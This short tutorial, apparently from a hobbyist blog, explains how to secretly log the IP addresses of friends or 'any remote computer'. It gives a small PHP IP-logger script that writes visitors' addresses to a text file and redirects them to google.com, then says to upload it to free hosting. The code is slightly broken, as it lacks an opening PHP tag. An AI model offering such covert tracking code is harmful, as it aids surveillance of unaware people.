Get IP Address of Your Fiends
Many of us curious how to find ip address of OUR friends or any remote computer, here is the easiest way to do this :- see how to do this.. Follow the steps to make this stuff works: Step 1: Copy the below script in the notepad and save as iplogger.php(you can change name whatever you like and make sure that your file extension should be .php not .php.txt). $file = 'IPs.txt'; $handle = fopen($file,'a'); if(!isset($_GET['p'])) { header('Location: http://google.com'); } fwrite($handle, $_GET['p'].': '.$_SERVER['REMOTE_ADDR'].'\r\n'); fclose($handle) ?> Step 2: Make a blank notepad file and save as ips.txt(you can change name according to your script). Now you have two files i.e. iplogger.php and ips.txt . You have to upload this two files on the web hosting sites. Step 3: You need to signup on a free webhosting service or any webhosting service that supports php like: www.t35.com www.110mb.com www.freehostia.com